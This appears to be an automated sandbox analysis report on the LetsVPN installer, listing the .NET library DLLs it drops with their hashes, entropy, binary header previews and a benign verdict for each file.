                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u-..........." ..0................. ........... ..............................K.....@.....................................O.......`............... ...............T............................................ ............... ..H............text....... ...................... ..`.rsrc...`...........................@..@.reloc..............................@..B.......................H........a..x\..................@.........................................(....*:...(....(....*&...(....*"..(....*"..(....*"..(....*..(....*.0..,........o....o......o.....jo.....o.....o.....o....*..s....}.....s....}.....s....}......2}.....(.....s4...}....*b.{.....o ....{....o!...*b.{.....o"....{....o#...*6.{.....o$...*.0..-........{....,.s%...z................s.......(.....*..{....,.s%...z.{....-..s&...}.....{......sS...o'...*..{....,.s%...z.{.....o(.......oU...*..{....,.s%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):100896
                                                                                                                                                                                                  Entropy (8bit):6.424195990637689
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:BU2qJ+RazRt/Kc4oJiOxFR4NdJF0/RfhF46HAoYKHgPzpS6w7fa1C9rD3qKi/mt:K2MRtrfrR+Pe/xAiAzpQ7y1C9rDW/W
                                                                                                                                                                                                  MD5:1617B96006C9490C73D574F69FCC5B57
                                                                                                                                                                                                  SHA1:21704ABDD45998D58F106C511C926C697C42320D
                                                                                                                                                                                                  SHA-256:828BA79ADE3358961DD11B11175A9F913E163D711B5C12749D109830FBAF366E
                                                                                                                                                                                                  SHA-512:EE6FF1F39C6E3DFB6F9AD7E9495D5A4C6A46E15D961FB8DFEFC09EAB0FFA6276287B3ABB27D2E08F2271605F365BF99EF00550345F0CFA8E516435E3E8F5CEA2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rd..........." ..0..T...........q... ........... ....................................@.................................eq..O.......`............\.. ............p..T............................................ ............... ..H............text....S... ...T.................. ..`.rsrc...`............V..............@..@.reloc...............Z..............@..B.................q......H.......<s.......................p......................................:.(......}....*..{....-...{....(.....{......o....*..{....-...{....(.....{......o....*....0..a........s....}.....s....}.....o....o.....+(.o......{.....o.......(.....o......(.....o....-....,..o.....*.........".4V.......0..J........o....o ....+"..(!.....{.....o.......(.....o".....(#...-...........o.....*........../;.......s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39456
                                                                                                                                                                                                  Entropy (8bit):6.494502675405848
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:A+meiCyrXOwS8uRssveum1peFLHFBbOBq3b2KZBZ25S+ST6nkj:ryrewFassveuPbBC03qKc/m5
                                                                                                                                                                                                  MD5:EC80554D9363197EBFCE80B8AD93E8BB
                                                                                                                                                                                                  SHA1:661EFC6DBD4F950076F23B41789C38F106953DEA
                                                                                                                                                                                                  SHA-256:CF84E892C469AC8931B7C0DBA290DD35D52340BBEEE669BCC91E9AF638D1AD85
                                                                                                                                                                                                  SHA-512:C2C76C4C5B2474546DDF4F8505E3094E6C2E116FE77A1E1B49BEC7E43643773A75B8262CF8579801F2656C8ADACBD27C33B76B7ABE89ED4614AB0B0143630FFA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i............" ..0..d............... ........... ....................................@....................................O.......l............l.. ...............T............................................ ............... ..H............text...4c... ...d.................. ..`.rsrc...l............f..............@..@.reloc...............j..............@..B........................H.......,A..\@..........................................................J.(.....s....}....**..F.(....**..E.(....*z.{.....To.....:o....&...(....*.0..a.........M.(.....o....,,.{.....`o.....`o....&.{.....o....o....o....&.o....,...o....(.....(....,...(....*..-.r...ps ...z.o!...,%.o"...r...p(#...-..o"...r#..p(#...*.*.*n.{.....~o....&..o$...(....*z..P.(.....o%...,...o&...(....*..{.....(o....&.........s'...(...+.{.....)o....&*..0..3........o(.......YE........3...........m...&...`...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):356896
                                                                                                                                                                                                  Entropy (8bit):6.249285614378823
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VFzzF5VOCxfiKKhsw4NiL0XRzx9WoCklyusCLU:vdfiKI4RzWSyu8
                                                                                                                                                                                                  MD5:C993931B4C49CBB08BE01F5948222C21
                                                                                                                                                                                                  SHA1:AFAFFE49A7709FB0DF1BEB36791A8800153593DB
                                                                                                                                                                                                  SHA-256:0FD8A36F7404D57DC3A3497E42E9ADE20268CDABAE2C481B134FF51555791A0A
                                                                                                                                                                                                  SHA-512:B367F098169A84F29643216E8182277884DB829C1F404BBA4BBC10290BA9FB88B1CC99D0AEC3DEBCF626445E20B8A04C3BF6EC520AB8866C4F417EA3E6F2C489
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i.}..........." ..0..<...........Q... ...`....... ..............................~Y....@..................................Q..O....`..H............D.. ............P..T............................................ ............... ..H............text....:... ...<.................. ..`.rsrc...H....`.......>..............@..@.reloc...............B..............@..B.................Q......H........b..@...................DP......................................"..s0...*"..s0...*>..}1.....}2...*..{1....O...,..{2...,..{1....O...o&...*2..O....3...*6.r...p.(4...*..(5.....}6......i.O...}7....{6....{7.....i(8.....}9...*2....i.(:...*>..s;.....(<...*V..{7....{6.....(=...*..0..1..........Y./.*...X.[......(=.........(=..........(>...*....0.._..............+P.../5.../..{9......O......O...o?....0.....%.X..O....O...+.....%.X..O....O.....X....2.*z...X...b...X...b`...X..b`...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):711712
                                                                                                                                                                                                  Entropy (8bit):5.966409790111297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:ZBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUO:ZBjk38WuBcAbwoA/BkjSHXP36RMGf
                                                                                                                                                                                                  MD5:3B3F8E087FC13A4B7BC9CF7DBBA4ED9B
                                                                                                                                                                                                  SHA1:321E0D0C5C275F2F57AF78BC465535A923D2427C
                                                                                                                                                                                                  SHA-256:AE71F96B5316A5B8EFF90F2DA4C9B55C57FB6A74193F380DEB38E49FE1010DDE
                                                                                                                                                                                                  SHA-512:F823D1460EB52FD039C248E6353587ADB2B78CA9EF988AA9EC7402C428FC3F178D099D5ECD106FDD9E2E051D87DB4A799CD3DE51C402E5C79E5014E6C8C6A6B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ............`....................................O....................... ........... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):521760
                                                                                                                                                                                                  Entropy (8bit):6.048533534397053
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:rRKflaWVRA6+LX9c1t3HpbOmhYIeDUQjcaPlq1fQx7NqEaElDp3sL2blV/VyUd93:rRt6+A1pbOsBQAa4f0pWSbb+1ikY
                                                                                                                                                                                                  MD5:F5058D921BF63CBA6CCC215365907B8B
                                                                                                                                                                                                  SHA1:F2085212F559708D955EA7A11D59C974FFA70797
                                                                                                                                                                                                  SHA-256:FF54E93669169BB320F3C9F086EC1E39C9EB26D582D63C1EEF77E5CC8A2801B5
                                                                                                                                                                                                  SHA-512:D85672DD7AD98999B3970190C8DCAF879E2DB1B19762B40712DD125931107F2D2A81911C96F2A01F999BBEE9F68F5EF2C5B7827F4B8B0E365C6B2FD5728B3ADC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....p_.........." ..0.................. ........... ....................... ............`.....................................O....................... ............................................................ ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Xw...............r...i............................................{E...*..{F...*V.(G.....}E.....}F...*...0..;........u1.....,/(H....{E....{E...oI...,.(J....{F....{F...oK...*.*. .... )UU.Z(H....{E...oL...X )UU.Z(J....{F...oM...X*.0..b........r...p......%..{E......%q4....4...-.&.+...4...oN....%..{F......%q5....5...-.&.+...5...oN....(O...*..{P...*..{Q...*V.(G.....}P.....}Q...*.0..;........u6.....,/(H....{P....{P...oI...,.(J....{Q....{Q...oK...*.*. .2;. )UU.Z(H....{P...oL

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54304
                                                                                                                                                                                                  Entropy (8bit):6.3200343699892345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:e2xghQUndJrmbnJAM6LjB4Mz5k+/FdS0/MuLs/09P2vq3b2KZBZV5SS+ST6nkKe:eGghQaJiFAMAhH/Dw/09Oi3qKVS/mQe
                                                                                                                                                                                                  MD5:FFECD2746B52EC4505805F28242F2369
                                                                                                                                                                                                  SHA1:1DBBA0503D5DC2E24EE7508850911AD1B973AF2B
                                                                                                                                                                                                  SHA-256:054AE39C180EA555CA0834E5C29CFC3F4F3BA034B4EC7E92554BE2109EE29E1B
                                                                                                                                                                                                  SHA-512:C56AD991F652F37C0257B5BE39B88B112ED26BC4EBBC2D3B1E431478A5366A98CB9EA6E641B8D84449DDADB1644538CBCE8FFE789E8AB8E32EF3350BC26C1B17
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0................. ........... ..............................j.....`.....................................O.......D............... ...............T............................................ ............... ..H............text........ ...................... ..`.rsrc...D...........................@..@.reloc..............................@..B.......................H........M...o............................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... ..,. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0..{........r...p......%..{.............-.&.+.......o ....%..{.............-.&.+.......o ....%..{.............-.&.+.......o ....(!...*..{"...*:.(......}"...*...0..#...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):104992
                                                                                                                                                                                                  Entropy (8bit):6.223980748676277
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:ddAKzGN0ifSJxFlm+FpoHloqUIdmJlllf07gllfUzb1kUyN1e/rWhsCMbdynBH3v:dbcl5mJlllf07gllfUzb6W/+b+OHb/b
                                                                                                                                                                                                  MD5:0EA18CFEE679D16BBF6D44C5A7F2ED8F
                                                                                                                                                                                                  SHA1:2C657D4709892B98D5796E644B2F13B568154C7B
                                                                                                                                                                                                  SHA-256:EB5B85284F7C26A7DE75F896CB95A3730253B0D64C1C4A415B10060F2C60CEAE
                                                                                                                                                                                                  SHA-512:A053B405BEE5754E3F0111AAF5CB6866F4D4467B52259D775E61DDC4EEF8A884CD54F3E207BFCC4DA4F548CE25FBFF161080F08604958ECEC3D8CA413E12869B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#............" ..0..b..........&.... ........... ..............................P.....`.....................................O....................l.. ............................................................ ............... ..H............text...,`... ...b.................. ..`.rsrc................d..............@..@.reloc...............j..............@..B........................H.......@...x.............................................................{....*"..}....*>..(......(....*"..s....*..{....*"..}....*......(....*..0..?.......s........}|......(.....,%.{|...,...o...........s....(...+(....*"..s....**....s....*R.o.....o......s....*..{....*"..}....*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*..{$...*"..}$...*..{%...*"..}%...*..{&...*"..}&...*..{'...*"..}'...*..{(...*"..}(...*..{)...*"..})...*rs................. ...(....*..0..................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):49184
                                                                                                                                                                                                  Entropy (8bit):6.266059158176653
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:NqRdL3e5rHMgWVTnyac4oeZrZ3W3qKZy/mb:kdLTtrZ3Wly/8
                                                                                                                                                                                                  MD5:74F34DD4A8A4B1F44B805FDF77CE0C68
                                                                                                                                                                                                  SHA1:E4241F0226EDB1EE78EBCD96049187BFC78E2EFA
                                                                                                                                                                                                  SHA-256:80CE7E9D4F09F73DEC13A550DC31E0EFFA79DD5BA07479954D6CDEBD3B6FD6AA
                                                                                                                                                                                                  SHA-512:A5A0B04A95409A9A04B2DE72F80EC410D5AC26AC46832E5DBE1F8C7A04EC7AD56915A387F3D33E4A3CA014327A1FDEDEAE1958AAF8AE8020CCB3830F68516341
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:. Z.........." ..0.................. ........... ....................................@.....................................O.......L............... ...........|................................................ ............... ..H............text........ ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B.......................H........K...Y............................................................{....*..{....*V.(......}......}....*...0..;........u......,/(.....{.....{....o....,.(.....{.....{....o....*.*. ...E )UU.Z(.....{....o....X )UU.Z(.....{....o....X*.0...........r...p......%..{.....................-.q.............-.&.+.......o.....%..{.....................-.q.............-.&.+.......o.....(....*..{....*"..}....*..{....*"..}....*..ra..p......%...%...%...(....( ...*...0..M........o...+..,...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.623339844778744
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:A0w2j7R3d4Q5ENmiL31SAAh1OSxJJssUJIJd4l4Trq3b2KZBZ8wS+ST6nkic3:VLAAh1OSxJJssUJIJal4T23qK5/ml
                                                                                                                                                                                                  MD5:E9BD7AFF9F7F4CE19A15A417937A179B
                                                                                                                                                                                                  SHA1:5189A5770C94648914EC9A44C2C76327291D04B0
                                                                                                                                                                                                  SHA-256:E95310BCE625924484DBD4165C7C0552F01BC6BC0CC6C03A65FB4C40E78D8A09
                                                                                                                                                                                                  SHA-512:D8B21999D1BE9B314962EB14FD37A2CD90661BAFD7974F8B5A25524101CF606C9A72B7BDF59004FD8D5B210CED0F1D130300374AB288ABF38CB95F9F68DCE2E1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g..........." ..0..*...........H... ...`....... ..............................i.....@..................................G..O....`..|............4.. ............F..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...|....`.......,..............@..@.reloc...............2..............@..B.................G......H.......8)...............................................................0..:.......s.......}......}......}......}...........s.....{....(...+*...0..:.......s.......}......}......}......}...........s.....{....(...+*...0..:.......s.......} .....}!.....}".....}#......$...s.....{ ...(...+*...0..:.......s%......}&.....}'.....}(.....})......*...s+....{&...(,...*...0..B.......s-.......}......}/.....}0.....}1.....}2......3...s+....{....(,...*F...(...+...(...+*.0..B.......s5.......}6.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.876326631146695
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:d6x4ushqWOHlLf2KQcvBZ9RQa/S+ShjmM6IGBkSZL:dEkq3b2KZBZdS+ST6nkwL
                                                                                                                                                                                                  MD5:C293FE3E2A6D35F139E4992D2E92CB90
                                                                                                                                                                                                  SHA1:65207323C9494A1A07677FCD8444E3A32A8D4D79
                                                                                                                                                                                                  SHA-256:2223DB72D86A4409E1960FFA326DD54FA652EE6F9AFCAA1B2E162E637CAF6228
                                                                                                                                                                                                  SHA-512:ED363E16C85CAF716BBF206D2A487ABEA22FE63CC688CDAE9DAB25B4DB21884FF06196659E5D51B29A351DEF35C4EB24937765B685DDCBD1D5A8FE2DFA1D2BA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............,... ...@....... ....................................@..................................+..O....@..X............... ....`.......*..T............................................ ............... ..H............text........ ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B.................+......H........ ..<...................(*.......................................(....*..0...............(....o........(....s....*...0............(.......(....s....(....*2r...p.(....*:.(......}....*...0...........{.......(....,..*~....*BSJB............v4.0.30319......l.......#~..,...x...#Strings............#US.........#GUID.......p...#Blob...........W..........3..........................................................9.........[...............................c.....c...{.c...>.c.....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58400
                                                                                                                                                                                                  Entropy (8bit):6.315564723596698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:O0GhwEvUmz5IR5tUe9CiXmEkzKeGIsNif11gNsNj8cIjqabZq3b2KZBZwS+ST6nD:MlIR56kCckz2DhiNIchab83qKu/mv8
                                                                                                                                                                                                  MD5:24E728F20D4174E87326141D124D6EEB
                                                                                                                                                                                                  SHA1:65CF7259921B5AAB0CB2CC0BA21A5FE69641C200
                                                                                                                                                                                                  SHA-256:D2D177DDB348675BF28E24C1D5F8925E3BD96AF5365F7E43EACA425F831CAA8C
                                                                                                                                                                                                  SHA-512:6D8B9758AB349AEF0BDAFC645193D50E34B83876BE04A71B96C8D2FEA55FEE2F5E1F243ACBD83AE7A452D7B5A3919E3A9ED416264B188D95B852610604F7919C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d............" ..0.............B.... ........... ....................... ............@.....................................O.......(............... ...............T............................................ ............... ..H............text...H.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................".......H........=.....................t.........................................(....*..(....*..(....*.......*Z~....,.*.o*...&......*.......*b~....-.r...ps....z~....*.(#...o ...*.0..........(#......o!.....(....Q*6.(.....(%...*.0..........(#........o".....(....Q*R.(.......(....('...*:(#......o'...*N.(.....(.....()...*2(#....o#...*2(#....o$...*..o....*..o....*2(#....o%...*2(#....o&...*6(#.....ok...*...0..........s.......}.....{....-...+........s.......(1...*6(#.....ol...*6..(....(3..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.748166697087464
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:daX0gijditBKMBRBHsEQ5hqWOHlLf2KQcvBZ9EpS+ShjmM6IGBkSQ:dakVRiBB83q3b2KZBZIS+ST6nkb
                                                                                                                                                                                                  MD5:08602BC21315B25E97D7E96D8FC2387F
                                                                                                                                                                                                  SHA1:84C18D3E3022FC445F15F4D589A9B9EF64B4CD6B
                                                                                                                                                                                                  SHA-256:48E07F638344EADF87BC216512464EEB05FD5359292F46ADB8F3F8B801A052FB
                                                                                                                                                                                                  SHA-512:7EDC2C8228D54C83D668D5EC9CE525976D9CC4590D7E53C3BC029AE92158A33AEC725C3A5221E5EFBFA3874F3F79918B02F48AB2BD2660B97B24C29B96F88787
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D............" ..0..............:... ...@....... ..............................a`....@.................................X:..O....@..d............&.. ....`......L9..T............................................ ............... ..H............text........ ...................... ..`.rsrc...d....@......................@..@.reloc.......`.......$..............@..B.................:......H........%.......................8.......................................0..K..........~....%-.&~..........s....%.....(....%~....(....,.r...p.r...p(....s....z*..0..#.......(......-...(....*..3...(....*s....z...(....%~....(....,.r)..p.r...p(....s....z*..0..#.......(......-..(....&*..3..(....&*s....z..0..7..........~....%-.&~..........s....%.....(.........~....(....*..0............(.........~....(....*..E................+$r9..p.(....*rI..p.(....*rc..p.(....*s....z...0..........

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):68640
                                                                                                                                                                                                  Entropy (8bit):6.075654477750361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Q2UTGlel80eXSfnUnM6sbwXN083qK/D/mT:hlel80eXcU+8n/U
                                                                                                                                                                                                  MD5:C7D493A5DCE0B2C4ECD8EAAB05FEA36D
                                                                                                                                                                                                  SHA1:E139EEC48C6927936E54F4D1F97699448A7E0692
                                                                                                                                                                                                  SHA-256:745A04AFCCC281E483C15F2677AA0FF5D25194C624C293DA9513B0361E6DF50B
                                                                                                                                                                                                  SHA-512:42D8CD32B54AEBCB811496448632F75F2C1BB339536D106B9A809D076CFBD9BFF2DF908BC49E57329BC66099C9975EDE27BEDDE03574F26B2DC576FC0BC6A9EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............." ..0.................. ........... .......................@............@.................................R...O....................... .... ......4...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......dB..P...........................................................6.......(....*.~....*F~H......on......*N........s....o...+*..0............(........~......o....*.0............(........~I.....or...*.0..%.........(..........(........~J.......ov...*....0..H.........(..........(........~K....oz............(....(.........{........o....*2~#....o....*2~"....o....*2~F....of...*6~G.....oj...*:~H......on...*2~$....o....*2~%....o....*>.(.......o....*...0..N........,........s.....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):110112
                                                                                                                                                                                                  Entropy (8bit):6.152337090409948
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:Yc6dvOJgPj92wqhe2CfvegBPLl86bqagz/i:MKYZTeu
                                                                                                                                                                                                  MD5:A350BD4DA0FE0F225C2EE57A7ADC974C
                                                                                                                                                                                                  SHA1:11B3FCD8D9E2667170845B25CBBFCEB9A5E6ADAC
                                                                                                                                                                                                  SHA-256:D498B2869289EC7D1D5F803B1ED303254F84F9CD0BFCEE98CCA4C903CCB46D42
                                                                                                                                                                                                  SHA-512:6055BF4F094DCFD0554EF4DF25BA774B0FC1A72C7CF045718E25A28C9D3EA10D198AA8FB478E332BB73A96E1245841B4F3A35A49C2FDA555ABB11F607EBA84A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
